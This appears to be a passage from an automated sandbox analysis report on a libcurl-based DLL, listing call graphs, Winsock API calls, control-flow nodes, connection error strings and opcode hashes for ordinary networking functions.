6b6c45eb 20932->20937 20933->20934 20938 6b6c4623 20933->20938 20935 6b70db71 __fassign 5 API calls 20934->20935 20939 6b6c4677 20935->20939 20936->20795 20940 6b70db71 __fassign 5 API calls 20937->20940 20975 6b6fa0e0 53 API calls 3 library calls 20938->20975 20939->20795 20942 6b6c4600 20940->20942 20942->20795 20943 6b6c4635 20944 6b6f06b0 74 API calls 20943->20944 20945 6b6c4645 20944->20945 20976 6b6c28e0 closesocket 20945->20976 20947->20792 20948->20789 20950 6b6c2886 20949->20950 20951 6b6c2853 20949->20951 20978 6b6e1080 21 API calls __dosmaperr 20950->20978 20953 6b6c28b4 20951->20953 20977 6b6e1080 21 API calls __dosmaperr 20951->20977 20979 6b711f49 14 API calls __dosmaperr 20953->20979 20954 6b6c2894 20954->20953 20958 6b6c289b htons 20954->20958 20957 6b6c2866 20957->20953 20960 6b6c286d htons 20957->20960 20958->20869 20959 6b6c28c5 20959->20869 20960->20869 20961->20908 20962->20864 20963->20875 20964->20878 20965->20882 20966->20888 20967->20897 20968->20892 20969->20889 20970->20910 20971->20920 20972->20926 20973->20925 20974->20917 20975->20943 20976->20863 20977->20957 20978->20954 20979->20959 20980->20804 20981->20817 21004 6b6d87e0 48 API calls 20982->21004 20984 6b6d8997 20987 6b70db71 __fassign 5 API calls 20984->20987 20985 6b6d8873 20985->20984 20991 6b6d88e0 20985->20991 21005 6b7194c5 47 API calls 20985->21005 20990 6b6d89a6 20987->20990 20989 6b6d88b8 curl_msnprintf 20989->20991 20990->20821 20991->20984 20991->20991 21006 6b716edc 26 API calls 20991->21006 20992 6b6d8922 20992->20984 20993 6b6d8966 20992->20993 20994 6b6f06b0 74 API calls 20993->20994 20995 6b6d8971 20994->20995 20996 6b70db71 __fassign 5 API calls 20995->20996 20997 6b6d8993 20996->20997 20997->20821 20998->20831 20999->20835 21000->20841 21001->20847 21002->20847 21003->20839 21004->20985 21005->20989 21006->20992 21583 6b6c2000 QueryPerformanceCounter GetTickCount 21584 6b6c9c00 78 API calls __fassign 21585 6b6cbc00 curl_formfree 21614 6b6c7e80 11 API calls 21615 6b6e3980 curl_slist_free_all 21587 6b6ce710 195 API calls 21588 6b6ca610 47 API calls 21616 6b6c9190 79 API calls ___from_strstr_to_strchr 21617 6b6ca190 31 API calls 21618 6b6c9890 101 API calls __fassign 21589 6b6d6310 GetEnvironmentVariableA 21511 6b6e7990 21512 6b6e79b4 21511->21512 21514 6b6e799f 21511->21514 21514->21512 21516 6b6e7a25 21514->21516 21528 6b6e83d0 138 API calls __fassign 21514->21528 21520 6b6c1e00 21516->21520 21517 6b6e7a2f 21518 6b6e7a5d WSACloseEvent 21517->21518 21519 6b6e7a73 21518->21519 21521 6b6c1fcc 21520->21521 21527 6b6c1e2b 21520->21527 21522 6b70db71 __fassign 5 API calls 21521->21522 21523 6b6c1fda 21522->21523 21523->21517 21524 6b6c1f9d 21524->21521 21525 6b6d1650 106 API calls 21524->21525 21525->21521 21527->21524 21529 6b6d1bd0 21527->21529 21528->21514 21530 6b6d1be4 21529->21530 21531 6b6f06b0 74 API calls 21530->21531 21540 6b6d1cc7 21530->21540 21532 6b6d1c5c 21531->21532 21543 6b6c1000 21532->21543 21534 6b6d1c62 21535 6b6d1c88 21534->21535 21558 6b6c28e0 closesocket 21534->21558 21537 6b6d1c9d 21535->21537 21559 6b6c28e0 closesocket 21535->21559 21539 6b6d1cb2 21537->21539 21560 6b6c28e0 closesocket 21537->21560 21539->21540 21561 6b6c28e0 closesocket 21539->21561 21540->21527 21544 6b6c15c0 21543->21544 21545 6b6c1649 21544->21545 21546 6b6c15d0 EnterCriticalSection LeaveCriticalSection 21544->21546 21545->21534 21547 6b6c15fd 21546->21547 21548 6b6c1609 21546->21548 21562 6b6c9150 CloseHandle 21547->21562 21549 6b6c160e 21548->21549 21550 6b6c1617 21548->21550 21563 6b6c9160 WaitForSingleObjectEx CloseHandle 21549->21563 21564 6b6c1670 DeleteCriticalSection closesocket __fassign 21550->21564 21552 6b6c1604 21556 6b6c1620 21552->21556 21555 6b6c1614 21555->21550 21557 6b6c1641 closesocket 21556->21557 21557->21545 21558->21535 21559->21537 21560->21539 21561->21540 21562->21552 21563->21555 21564->21556

                                                                                                                            Executed Functions

                                                                                                                            Function 6B6F6D50 Relevance: 24.2, APIs: 16, Instructions: 171networkCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 134 6b6f6d50-6b6f6d87 socket 135 6b6f6d8d-6b6f6dd6 htonl setsockopt 134->135 136 6b6f6f21-6b6f6f34 call 6b70db71 134->136 137 6b6f6f0f-6b6f6f1f closesocket * 3 135->137 138 6b6f6ddc-6b6f6dec bind 135->138 137->136 138->137 140 6b6f6df2-6b6f6e04 getsockname 138->140 140->137 142 6b6f6e0a-6b6f6e16 listen 140->142 142->137 143 6b6f6e1c-6b6f6e29 socket 142->143 143->137 144 6b6f6e2f-6b6f6e3f connect 143->144 144->137 145 6b6f6e45-6b6f6e56 accept 144->145 145->137 146 6b6f6e5c-6b6f6e73 curl_msnprintf 145->146 147 6b6f6e76-6b6f6e7b 146->147 147->147 148 6b6f6e7d-6b6f6e90 send 147->148 148->137 149 6b6f6e92-6b6f6ea5 recv 148->149 149->137 150 6b6f6ea7-6b6f6eb0 149->150 151 6b6f6ec3-6b6f6ec6 150->151 152 6b6f6eb2-6b6f6eb6 150->152 153 6b6f6ec8-6b6f6ecc 151->153 155 6b6f6ef5-6b6f6f0e closesocket call 6b70db71 151->155 152->153 154 6b6f6eb8-6b6f6ec1 152->154 153->137 156 6b6f6ece-6b6f6ed1 153->156 154->151 154->152 156->155 158 6b6f6ed3-6b6f6ed9 156->158 158->137 160 6b6f6edb-6b6f6ede 158->160 160->155 161 6b6f6ee0-6b6f6ee6 160->161 161->137 162 6b6f6ee8-6b6f6eeb 161->162 162->155 163 6b6f6eed-6b6f6ef3 162->163 163->137 163->155
                                                                                                                            APIs
                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 6B6F6D80
                                                                                                                            • htonl.WS2_32(7F000001), ref: 6B6F6DA3
                                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 6B6F6DCD
                                                                                                                            • bind.WS2_32(00000000,?,00000010), ref: 6B6F6DE3
                                                                                                                            • getsockname.WS2_32(00000000,?,00000010), ref: 6B6F6DFB
                                                                                                                            • listen.WS2_32(00000000,00000001), ref: 6B6F6E0D
                                                                                                                            • socket.WS2_32(00000002,00000001,00000000), ref: 6B6F6E22
                                                                                                                            • connect.WS2_32(00000000,?,00000010), ref: 6B6F6E36
                                                                                                                            • accept.WS2_32(00000000,00000000,00000000), ref: 6B6F6E4A
                                                                                                                            • curl_msnprintf.LIBCURL(?,0000000C,6B730CA0,6B6C1172), ref: 6B6F6E68
                                                                                                                            • send.WS2_32(6B6C1172,?,?,00000000), ref: 6B6F6E88
                                                                                                                            • recv.WS2_32(C74C79C0,00000001,0000000C,00000000), ref: 6B6F6E9D
                                                                                                                            • closesocket.WS2_32(00000000), ref: 6B6F6EF6
                                                                                                                            • closesocket.WS2_32(00000000), ref: 6B6F6F16
                                                                                                                            • closesocket.WS2_32(6B6C1172), ref: 6B6F6F1A
                                                                                                                            • closesocket.WS2_32(C74C79C0), ref: 6B6F6F1F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: closesocket$socket$acceptbindconnectcurl_msnprintfgetsocknamehtonllistenrecvsendsetsockopt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4135244658-0
                                                                                                                            • Opcode ID: 942f72e852dfa858aa4c2396e58b1b9fff88825678885629bf4f7c8019508b76
                                                                                                                            • Instruction ID: 98f49f35b89971e72205dceb9d96e8e3497c09310d714a0854c1a009fa906c9a
                                                                                                                            • Opcode Fuzzy Hash: 942f72e852dfa858aa4c2396e58b1b9fff88825678885629bf4f7c8019508b76
                                                                                                                            • Instruction Fuzzy Hash: 0951E571909204ABDB109F78CC84BAD7B7BAF06330F1053A6E979AB1D0D774A947CB60
                                                                                                                            Function 6B6EFEF0 Relevance: 15.3, APIs: 10, Instructions: 347networksleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 164 6b6efef0-6b6eff0e 165 6b6eff2b-6b6eff35 164->165 166 6b6eff10-6b6eff17 164->166 168 6b6eff3b-6b6eff3d 165->168 169 6b6f0384-6b6f0393 call 6b70db71 165->169 166->165 167 6b6eff19 166->167 170 6b6eff20-6b6eff24 167->170 171 6b6f036e-6b6f0373 168->171 172 6b6eff43 168->172 174 6b6eff69-6b6eff98 170->174 175 6b6eff26-6b6eff29 170->175 178 6b6f037d-6b6f037e Sleep 171->178 176 6b6eff4d-6b6eff68 WSASetLastError call 6b70db71 172->176 177 6b6eff45-6b6eff47 172->177 182 6b6effa0-6b6effbf 174->182 175->165 175->170 177->176 180 6b6f0363-6b6f0365 177->180 178->169 180->178 183 6b6f0367 180->183 185 6b6f00c4-6b6f00d3 182->185 186 6b6effc5 182->186 183->171 187 6b6f0369-6b6f036c 183->187 185->182 188 6b6f00d9-6b6f00db 185->188 189 6b6effcb-6b6effed 186->189 190 6b6f0100-6b6f010b WSASetLastError 186->190 187->171 187->178 194 6b6f0164-6b6f0178 188->194 195 6b6f00e1-6b6f00e3 188->195 191 6b6efff3-6b6f000d 189->191 192 6b6f00c1 189->192 193 6b6f010e-6b6f011e call 6b70db71 190->193 196 6b6f000f-6b6f0013 191->196 197 6b6f0046-6b6f0048 191->197 192->185 200 6b6f017a 194->200 201 6b6f01a1-6b6f01e1 call 6b70db90 call 6b70e290 * 2 194->201 195->194 199 6b6f00e5-6b6f00e7 195->199 202 6b6f0015-6b6f001c 196->202 203 6b6f0023-6b6f0025 196->203 206 6b6f004a-6b6f004e 197->206 207 6b6f0081-6b6f0086 197->207 199->194 208 6b6f00e9-6b6f00f9 199->208 209 6b6f017c-6b6f017e 200->209 210 6b6f0180-6b6f018a 200->210 257 6b6f020f 201->257 258 6b6f01e3 201->258 202->203 214 6b6f001e-6b6f0021 202->214 215 6b6f0027-6b6f002a 203->215 216 6b6f0040 203->216 218 6b6f005e-6b6f0060 206->218 219 6b6f0050-6b6f0057 206->219 207->192 212 6b6f0088-6b6f008c 207->212 220 6b6f011f-6b6f0121 208->220 221 6b6f00fb 208->221 209->210 211 6b6f018f-6b6f0191 209->211 213 6b6f0237-6b6f0271 select 210->213 223 6b6f0197 211->223 224 6b6f0223-6b6f022d 211->224 225 6b6f009e-6b6f00a0 212->225 226 6b6f008e 212->226 222 6b6f0277-6b6f0279 213->222 214->202 214->203 215->216 229 6b6f002c-6b6f003a 215->229 216->197 232 6b6f007b 218->232 233 6b6f0062-6b6f0065 218->233 219->218 231 6b6f0059-6b6f005c 219->231 227 6b6f0147-6b6f014c 220->227 228 6b6f0123 220->228 221->222 222->193 234 6b6f027f-6b6f028a 222->234 223->201 235 6b6f0199-6b6f019b 223->235 224->213 237 6b6f00bb 225->237 238 6b6f00a2-6b6f00a5 225->238 236 6b6f0090-6b6f0097 226->236 242 6b6f0156-6b6f015f Sleep 227->242 239 6b6f0129-6b6f0137 WSASetLastError 228->239 240 6b6f0125-6b6f0127 228->240 229->216 231->218 231->219 232->207 233->232 243 6b6f0067-6b6f0075 233->243 244 6b6f0290-6b6f029b 234->244 235->201 235->224 236->225 245 6b6f0099-6b6f009c 236->245 237->192 238->237 246 6b6f00a7-6b6f00b5 238->246 239->222 240->239 247 6b6f013c-6b6f013e 240->247 242->222 243->232 249 6b6f0343-6b6f034a 244->249 250 6b6f02a1-6b6f02b0 __WSAFDIsSet 244->250 245->225 245->236 246->237 247->242 251 6b6f0140 247->251 249->244 253 6b6f0350-6b6f0362 call 6b70db71 249->253 254 6b6f02df-6b6f02f0 __WSAFDIsSet 250->254 255 6b6f02b2-6b6f02bf 250->255 251->227 256 6b6f0142-6b6f0145 251->256 262 6b6f02fc-6b6f030d __WSAFDIsSet 254->262 263 6b6f02f2-6b6f02f6 254->263 260 6b6f02cc-6b6f02d5 255->260 261 6b6f02c1-6b6f02c9 255->261 256->227 256->242 266 6b6f0215-6b6f0221 257->266 264 6b6f01e5-6b6f01f0 258->264 265 6b6f01f2-6b6f020d 258->265 260->254 268 6b6f02d7-6b6f02dc 260->268 261->260 270 6b6f030f-6b6f031c 262->270 271 6b6f033c-6b6f0340 262->271 263->262 269 6b6f02f8 263->269 264->265 264->266 265->213 266->213 268->254 269->262 273 6b6f031e-6b6f0326 270->273 274 6b6f0329-6b6f0332 270->274 271->249 272 6b6f0342 271->272 272->249 273->274 274->271 275 6b6f0334-6b6f0339 274->275 275->271
                                                                                                                            APIs
                                                                                                                            • WSASetLastError.WS2_32(00002726), ref: 6B6EFF52
                                                                                                                            • WSASetLastError.WS2_32(00002726,00000000,00000001,000000FF), ref: 6B6F0105
                                                                                                                            • WSASetLastError.WS2_32(00002726,00000000,00000001,000000FF), ref: 6B6F012E
                                                                                                                            • Sleep.KERNEL32(FFFFFFFE,00000000,00000001,000000FF), ref: 6B6F0157
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6F01AA
                                                                                                                            • select.WS2_32(?,?,?,?,?), ref: 6B6F0271
                                                                                                                            • __WSAFDIsSet.WS2_32(?,?), ref: 6B6F02A9
                                                                                                                            • __WSAFDIsSet.WS2_32(?,?), ref: 6B6F02E9
                                                                                                                            • __WSAFDIsSet.WS2_32(?,?), ref: 6B6F0306
                                                                                                                            • Sleep.KERNEL32(FFFFFFFE), ref: 6B6F037E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$Sleep$Unothrow_t@std@@@__ehfuncinfo$??2@select
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1691268743-0
                                                                                                                            • Opcode ID: 086e0b6a84231f487bc81a9ec012026eb2c1e74d270ef29f0820153e47994543
                                                                                                                            • Instruction ID: ffcbda5257f79f5bcf841fca8670f026def57111583e868bae8aced08f4f1104
                                                                                                                            • Opcode Fuzzy Hash: 086e0b6a84231f487bc81a9ec012026eb2c1e74d270ef29f0820153e47994543
                                                                                                                            • Instruction Fuzzy Hash: D0D199B0A042198BEB25CF69C9507EA73FEFF49310F1045EDE859D7290D7788A82CB54
                                                                                                                            Function 6B6C2D20 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 409COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 346 6b6c2d20-6b6c2d68 347 6b6c2d6a 346->347 348 6b6c2d80-6b6c2dc4 call 6b6fe5d0 346->348 349 6b6c2d6d-6b6c2d7f call 6b70db71 347->349 354 6b6c2dc9-6b6c2dcc 348->354 355 6b6c2dc6 348->355 356 6b6c2dce-6b6c2dd1 354->356 357 6b6c2de1-6b6c2de8 354->357 355->354 358 6b6c2ddf 356->358 359 6b6c2dd3-6b6c2dd6 356->359 360 6b6c2dee-6b6c2e34 call 6b6fe680 357->360 358->357 359->360 361 6b6c2dd8-6b6c2ddd 359->361 364 6b6c2e3a-6b6c2e3c 360->364 365 6b6c32c4-6b6c32d2 call 6b6f05d0 360->365 361->357 364->365 367 6b6c2e42 364->367 371 6b6c32d7-6b6c32e7 call 6b70db71 365->371 369 6b6c2e4c-6b6c2e53 367->369 370 6b6c2e44-6b6c2e46 367->370 372 6b6c2e9a-6b6c2e9c 369->372 373 6b6c2e55-6b6c2e6f call 6b6c3f40 369->373 370->365 370->369 374 6b6c2ea0-6b6c2eb5 372->374 383 6b6c2e87-6b6c2e99 call 6b70db71 373->383 384 6b6c2e71-6b6c2e7a 373->384 377 6b6c2ebb-6b6c2ed4 call 6b6f03a0 374->377 378 6b6c3120 374->378 391 6b6c2fcc-6b6c2fcf 377->391 392 6b6c2eda-6b6c2f28 call 6b6fe680 377->392 382 6b6c3126-6b6c312a 378->382 382->374 387 6b6c3130-6b6c3132 382->387 384->383 388 6b6c2e7c-6b6c2e84 call 6b6c4060 384->388 393 6b6c32af 387->393 394 6b6c3138-6b6c313f 387->394 388->383 399 6b6c2ff9-6b6c3011 call 6b6c4740 391->399 400 6b6c2fd1-6b6c2fd7 391->400 409 6b6c2f2a-6b6c2f30 392->409 410 6b6c2f54-6b6c2f56 392->410 397 6b6c32b1-6b6c32c3 call 6b70db71 393->397 394->393 395 6b6c3145-6b6c314c 394->395 395->393 401 6b6c3152-6b6c3167 call 6b6c46a0 395->401 416 6b6c3185-6b6c31d4 399->416 417 6b6c3017 399->417 400->399 405 6b6c2fd9-6b6c2fdb 400->405 401->349 422 6b6c316d-6b6c3174 401->422 405->378 411 6b6c2fe1-6b6c2ff7 call 6b6c4740 405->411 418 6b6c2f3a-6b6c2f4f call 6b6f06b0 409->418 419 6b6c2f32-6b6c2f38 409->419 414 6b6c2f5c-6b6c2f63 410->414 415 6b6c301d-6b6c301f 410->415 411->417 414->415 423 6b6c2f69-6b6c2fa6 call 6b6fe680 414->423 415->378 424 6b6c3025-6b6c3041 WSASetLastError 415->424 425 6b6c31eb-6b6c31fe call 6b6c3f40 416->425 426 6b6c31d6-6b6c31e0 call 6b6c28e0 416->426 417->415 418->410 419->410 419->418 428 6b6c322a-6b6c3231 422->428 429 6b6c317a-6b6c3180 422->429 423->415 443 6b6c2fa8 423->443 424->378 431 6b6c3047-6b6c308e call 6b6d8450 call 6b6fa0e0 call 6b6f06b0 424->431 425->371 446 6b6c3204-6b6c3206 425->446 426->425 434 6b6c323b-6b6c3242 428->434 435 6b6c3233-6b6c3239 428->435 436 6b6c3252-6b6c3295 call 6b6fa0e0 call 6b6f05d0 429->436 465 6b6c309e-6b6c30ae call 6b70db90 431->465 466 6b6c3090-6b6c309c 431->466 441 6b6c324c 434->441 442 6b6c3244-6b6c324a 434->442 435->436 436->397 461 6b6c3297-6b6c32ae call 6b70db71 436->461 441->436 442->436 447 6b6c2faa-6b6c2fb0 443->447 448 6b6c2fb2-6b6c2fca call 6b6c46a0 443->448 446->371 451 6b6c320c-6b6c320f call 6b6c4060 446->451 447->415 447->448 448->415 456 6b6c3214-6b6c3229 call 6b70db71 451->456 467 6b6c30b3-6b6c30ca 465->467 466->467 470 6b6c30ec-6b6c3106 call 6b6c46a0 467->470 471 6b6c30cc-6b6c30d1 467->471 477 6b6c3118-6b6c311e 470->477 478 6b6c3108-6b6c3116 470->478 471->470 472 6b6c30d3-6b6c30da 471->472 474 6b6c30e0-6b6c30e3 472->474 474->470 476 6b6c30e5-6b6c30ea 474->476 476->470 476->474 477->382 478->378 478->477
                                                                                                                            Strings
                                                                                                                            • Failed to connect to %s port %ld: %s, xrefs: 6B6C327D
                                                                                                                            • After %I64dms connect time, move on!, xrefs: 6B6C2F3C
                                                                                                                            • Connection time-out, xrefs: 6B6C32C4
                                                                                                                            • connect to %s port %ld failed: %s, xrefs: 6B6C3070
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: After %I64dms connect time, move on!$Connection time-out$Failed to connect to %s port %ld: %s$connect to %s port %ld failed: %s
                                                                                                                            • API String ID: 0-184998888
                                                                                                                            • Opcode ID: 4d2d07853d6dddb463f353d523d1ba980c8e040a4ad7d1ddd0f506e9d6a5ddee
                                                                                                                            • Instruction ID: bbb73d10757c69febd2cfbe401119ee47ba58b8f8a3204f31bf8f2e19c37b324
                                                                                                                            • Opcode Fuzzy Hash: 4d2d07853d6dddb463f353d523d1ba980c8e040a4ad7d1ddd0f506e9d6a5ddee
                                                                                                                            • Instruction Fuzzy Hash: 34F1D1B1A007049FDB21DF389C41BEBB7B5EF89318F0041E9E85D97251DB39AA84CB52
                                                                                                                            Function 6B6F09F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 138networkCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 554 6b6f09f0-6b6f0a4e 555 6b6f0b1a-6b6f0b3c send 554->555 556 6b6f0a54-6b6f0a5f 554->556 558 6b6f0b3e-6b6f0b4c WSAGetLastError 555->558 559 6b6f0ba5-6b6f0bb7 call 6b70db71 555->559 556->555 557 6b6f0a65-6b6f0a68 556->557 561 6b6f0a6a-6b6f0a6c 557->561 562 6b6f0a72-6b6f0a80 call 6b6f03a0 557->562 563 6b6f0b4e-6b6f0b68 call 6b70db71 558->563 564 6b6f0b69-6b6f0b9f call 6b6fa0e0 call 6b6f05d0 558->564 561->555 561->562 569 6b6f0a85-6b6f0a8b 562->569 564->559 569->555 572 6b6f0a91-6b6f0a93 569->572 572->555 574 6b6f0a99-6b6f0a9d 572->574 576 6b6f0a9f-6b6f0abc 574->576 577 6b6f0aeb 574->577 583 6b6f0abe-6b6f0acf 576->583 584 6b6f0ad1-6b6f0aea call 6b70db71 576->584 578 6b6f0af1-6b6f0af3 577->578 579 6b6f0af5-6b6f0b0c recv 578->579 580 6b6f0b13 578->580 579->555 582 6b6f0b0e-6b6f0b11 579->582 580->555 582->555 583->578
                                                                                                                            APIs
                                                                                                                            • recv.WS2_32(?,?,?,00000000), ref: 6B6F0B04
                                                                                                                            • send.WS2_32(?,?,?,00000000), ref: 6B6F0B2B
                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B6F0B3E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastrecvsend
                                                                                                                            • String ID: Send failure: %s
                                                                                                                            • API String ID: 3418755260-857917747
                                                                                                                            • Opcode ID: 7ad36d2e7356ec7ed1d7823d97d5de49b9bfbd58f105dbdc3c187012287797db
                                                                                                                            • Instruction ID: 53959c87eca85fc5d8a90debbf1f0b601e40472435cff3826b8151a5b056b5a0
                                                                                                                            • Opcode Fuzzy Hash: 7ad36d2e7356ec7ed1d7823d97d5de49b9bfbd58f105dbdc3c187012287797db
                                                                                                                            • Instruction Fuzzy Hash: BA51B4B1B002199FDB20CF28CC41B99B7F9EF05364F1042AAE969D7390D775A992CF80
                                                                                                                            Function 6B6C40C0 Relevance: 30.2, APIs: 10, Strings: 7, Instructions: 421networkCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 6b6c40c0-6b6c4136 1 6b6c4138 0->1 2 6b6c413b-6b6c414f 0->2 1->2 3 6b6c4160-6b6c417a call 6b70f070 2->3 4 6b6c4151-6b6c415b 2->4 7 6b6c417c-6b6c41ad call 6b6e7550 * 2 3->7 8 6b6c41af-6b6c41c7 socket 3->8 4->3 9 6b6c41c9-6b6c41cc 7->9 8->9 11 6b6c4512 9->11 12 6b6c41d2-6b6c41d9 9->12 16 6b6c4517-6b6c4527 call 6b70db71 11->16 14 6b6c41db-6b6c41e3 call 6b6ea660 12->14 15 6b6c41e6-6b6c4210 call 6b6c2840 12->15 14->15 25 6b6c4267-6b6c4288 call 6b6f06b0 15->25 26 6b6c4212-6b6c4266 call 6b711f49 * 2 call 6b6fa0e0 call 6b6f05d0 call 6b6c28e0 call 6b70db71 15->26 32 6b6c428f-6b6c4296 25->32 33 6b6c428a-6b6c428d 25->33 35 6b6c4300 32->35 36 6b6c4298-6b6c42a6 32->36 33->32 33->35 38 6b6c4307-6b6c432c 35->38 36->38 39 6b6c42a8-6b6c42d0 setsockopt 36->39 41 6b6c432e-6b6c433f call 6b704f30 38->41 42 6b6c4359-6b6c435c 38->42 39->38 43 6b6c42d2-6b6c42fe WSAGetLastError call 6b6fa0e0 call 6b6f06b0 39->43 58 6b6c434d-6b6c4357 41->58 59 6b6c4341-6b6c434b 41->59 46 6b6c435e-6b6c437f getsockopt 42->46 47 6b6c43a9-6b6c43b0 42->47 43->38 52 6b6c438f-6b6c43a3 setsockopt 46->52 53 6b6c4381-6b6c438d 46->53 54 6b6c43b6-6b6c43bd 47->54 55 6b6c4481-6b6c4488 47->55 52->47 53->47 53->52 54->55 62 6b6c43c3-6b6c43e6 setsockopt 54->62 60 6b6c448a-6b6c44bd call 6b6e7550 * 2 55->60 61 6b6c44c6-6b6c44cf 55->61 58->46 59->47 94 6b6c44bf 60->94 95 6b6c4528-6b6c452a 60->95 66 6b6c44d6-6b6c44fb call 6b6df0a0 call 6b6c39a0 61->66 67 6b6c44d1-6b6c44d4 61->67 69 6b6c43fc-6b6c4469 call 6b7022a0 * 2 WSAIoctl 62->69 70 6b6c43e8-6b6c43f7 call 6b6f06b0 62->70 74 6b6c454c-6b6c4574 call 6b6ea660 call 6b6fe5d0 66->74 92 6b6c44fd-6b6c4510 call 6b6c28e0 66->92 67->66 67->74 69->55 91 6b6c446b-6b6c447e WSAGetLastError call 6b6f06b0 69->91 70->55 98 6b6c4576-6b6c459e call 6b6e69d0 * 2 74->98 99 6b6c45a1-6b6c45a8 74->99 91->55 92->11 92->16 94->61 95->61 100 6b6c452c-6b6c454b call 6b6c28e0 call 6b70db71 95->100 98->99 101 6b6c45ae-6b6c45b5 99->101 102 6b6c467b-6b6c4695 call 6b70db71 99->102 101->102 107 6b6c45bb-6b6c45c2 101->107 111 6b6c4604-6b6c4613 WSAGetLastError 107->111 112 6b6c45c4-6b6c45db connect 107->112 118 6b6c4615-6b6c461a 111->118 119 6b6c4660-6b6c467a call 6b70db71 111->119 112->111 117 6b6c45dd-6b6c45e5 112->117 117->16 122 6b6c45eb-6b6c4603 call 6b70db71 117->122 123 6b6c461c-6b6c4621 118->123 124 6b6c4623-6b6c465b call 6b6fa0e0 call 6b6f06b0 call 6b6c28e0 118->124 123->119 123->124 124->11
                                                                                                                            APIs
                                                                                                                            • socket.WS2_32(?,?,?), ref: 6B6C41C1
                                                                                                                              • Part of subcall function 6B6F06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lnk), ref: 6B6F06EF
                                                                                                                              • Part of subcall function 6B6F06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B6F072F
                                                                                                                            • setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 6B6C42C8
                                                                                                                            • WSAGetLastError.WS2_32(?,00000100), ref: 6B6C42DE
                                                                                                                            • getsockopt.WS2_32(00000000,0000FFFF,00001001,00000000,00000004), ref: 6B6C4377
                                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00001001,00004020,00000004), ref: 6B6C43A3
